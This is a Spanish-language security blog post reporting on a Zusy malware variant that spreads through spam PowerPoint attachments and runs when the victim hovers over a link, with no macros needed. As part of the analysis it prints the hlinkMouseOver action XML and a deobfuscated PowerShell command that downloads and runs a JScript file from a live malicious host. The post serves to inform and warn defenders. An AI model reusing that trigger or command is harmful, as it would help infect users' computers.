Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Entradas Mensuales

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Foro de elhacker.net - Noticias

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon Malware en PowerPoint sin usar Macros, JScript o VBA se activa al pasar el ratón por encima




A diferencia de otros archivos de Microsoft Office que contienen macros maliciosas, el documento que ha sido descubierto utiliza comandos PowerShell, y simplemente con pasar por encima el ratón de un enlace (mouse hover) se activa la secuencia del payload.


Una nueva variante de un malware llamado "Zusy" se ha encontrado en la propagación como un archivo de PowerPoint adjunto a correos electrónicos de spam con títulos como "Orden de Compra # 130527" y "Confirmación". Es interesante porque no requiere que el usuario habilite las macros para ejecutarse.

 


La mayoría del malware de Office se basa en que los usuarios activan las macros para descargar alguna carga útil ejecutable que hace la mayoría de las cosas maliciosas, pero este malware utiliza la función del programa externo en su lugar.

Este ataque explota una característica legítima de PowerPoint. Colocar el cursor sobre un hipervínculo en una presentación puede desencadenar macros, llevar al usuario a la siguiente diapositiva, reproducir un sonido, abrir una página web o abrir una aplicación externa. La mayoría de los ataques malware basados en documentos a través de PowerPoint usarían macros para descargar la carga maliciosa, pero ahora que Office bloquea macros por defecto y más usuarios saben que no las habilitan, los atacantes están buscando otras formas de engañar a los usuarios. 

Cuando se abre el archivo malicioso de PowerPoint, muestra una pantalla con un solo enlace que dice "Cargando ... espere": 

En caso de que la víctima pase el cursor del ratón por encima de este link se ejecutará un código malicioso que intentará conectarse a una página web para descargar malware en el ordenador. Por tanto, ni siquiera es necesario hacer clic en el enlace, un detalle que ha llamado la atención de los investigadores de seguridad.



<a:hlinkMouseOver r:id="rId2" action="ppaction://program"/>

En efecto se puede ejecutar un comando al pasar por encima de un enlace en un PowerPoint:


ppaction://protocol 

Para usuarios con vista protegida deshabilitada o cuando los usuarios ignoran la ventana emergente y permiten que el código se ejecute, el código malicioso de PowerShell intentará conectarse a http://cccn.nl/c.php y descargar otro archivo. 



Y el comando desofuscado en PowerShell hace que visite la URL maligna (hxxp) que descarga un fichero .JSE
Esto indica que es un archivo JScript Encoded codificado que es ejecutado por WScript para descagar un fichero EXE
powershell -NoP -NonI -W Hidden -Exec Bypass
 "IEX (New-Object System.Net.WebClient).
DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\"$env:temp\ii.jse\");
 Invoke-Item \"$env:temp\ii.jse\""
 
Si el usuario tiene habilitada la función Vista protegida, que de acuerdo con Microsoft está activada por defecto tanto en Windows Defender como en Office 365, PowerPoint detendrá el ataque y mostrará un aviso de seguridad.

Algunos análisis completos y muestras del malware en inglés:
Algunos expertos de seguridad aseguran que PowerPoint Viewer, al no ser compatible con la ejecución de programas externos, no está afectado por este fallo.

Fuentes:
http://computerhoy.com/noticias/software/detectado-nuevo-malware-que-infecta-tu-ordenador-powerpoint-63234
https://www.redeszone.net/2017/06/07/ocultar-malware-powerpoint-sin-macros/

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.